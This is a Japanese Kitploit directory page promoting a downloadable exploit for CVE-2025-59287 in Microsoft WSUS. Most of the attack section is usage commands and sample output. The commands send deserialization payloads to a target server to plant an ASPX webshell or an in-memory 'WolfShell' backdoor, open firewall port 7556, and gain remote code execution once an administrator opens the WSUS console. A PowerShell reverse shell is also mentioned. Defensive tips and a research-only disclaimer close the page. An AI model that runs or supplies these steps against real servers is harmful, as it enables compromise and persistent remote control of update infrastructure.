Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-59287 — CVE-2025-59287 のエクスプロイト。WolfShell メモリウェブシェルを WSUS サーバーに注入し、管理コンソールが開かれた際にリモートコード実行を実現します。 | Kitploit
ツール/GitHubGitHub/0x7556/cve-2025-59287
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHub0x7556/cve-2025-59287

CVE-2025-59287

CVE-2025-59287 のエクスプロイト。WolfShell メモリウェブシェルを WSUS サーバーに注入し、管理コンソールが開かれた際にリモートコード実行を実現します。

リポジトリを見る
7310ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-59287 WSUS脆弱性再現

CVE-2025-59287 — WolfShell ウルヴァリン フォワード型メモリシェル注入

概要

CVE-2025-59287 は WSUS 関連コンポーネントの論理的な欠陥を利用し、WolfShell メモリシェルをターゲットサーバーに注入します。管理者が WSUS コンソールを開くと(デフォルトではランダムな1〜30分以内にトリガー)、メモリシェルが発動し、リモートコード実行(RCE)に至ります。本ドキュメントには、悪用例、必要なファイル、および防御の推奨事項が含まれています。

使用例

使用方法

ターゲットサーバーに ysoserial.net の逆シリアル化ペイロードを送信します。機能はカスタマイズ可能で、本プロジェクトではウルヴァリン メモリシェルの注入をデモンストレーションします。

root@kitploit:~
Usage: CVE-2025-59287 <target_url> <payload_file>

ウルヴァリン WebShell ASPX シェル注入の例

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt

ウルヴァリン WolfShell フォワード型シェルのメモリ注入の例

root@kitploit:~
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters

[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS

ファイアウォールでポート7556を許可する例

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

exp

PowerShell リバースシェル

win2019 Defender がブロック・削除するため使用不可 Defende

WSUS コンソールを開いて脆弱性をトリガー

図のようにポート 7556 のリッスンに成功。ウルヴァリン メモリフォワード型シェルが注入されたことを示します。 WolfDoor 1

ウルヴァリン接続 メモリシェル CMD コマンド実行

WolfDoor 2

防御の推奨事項

  • 影響を受ける WSUS サーバーに、ベンダーが提供するパッチまたは一時的な緩和策を直ちに適用してください。
  • WSUS 内の不審なクライアント(例:hawktrace.local)を確認し、削除してください。
  • WSUS 管理コンソールへのアクセスを制限・監査し、信頼できる管理者のみがアクセスできるようにしてください。
  • 侵入検知、メモリスキャン、ホスト整合性監視ツールを使用して、異常なメモリシェルや不審なモジュールを検出してください。
  • パッチが適用されるまで、信頼できない環境で WSUS コンソールを開いたり、不審な更新項目を処理したりしないでください。

免責事項

本ドキュメントは、セキュリティ研究と防御の目的のみに使用されます。関連する悪用コードを、許可されていないシステムや攻撃活動に使用しないでください。

参考リンク

https://github.com/0x7556/wolfshell https://github.com/0x7556/CVE-2025-59287

ツールをダウンロード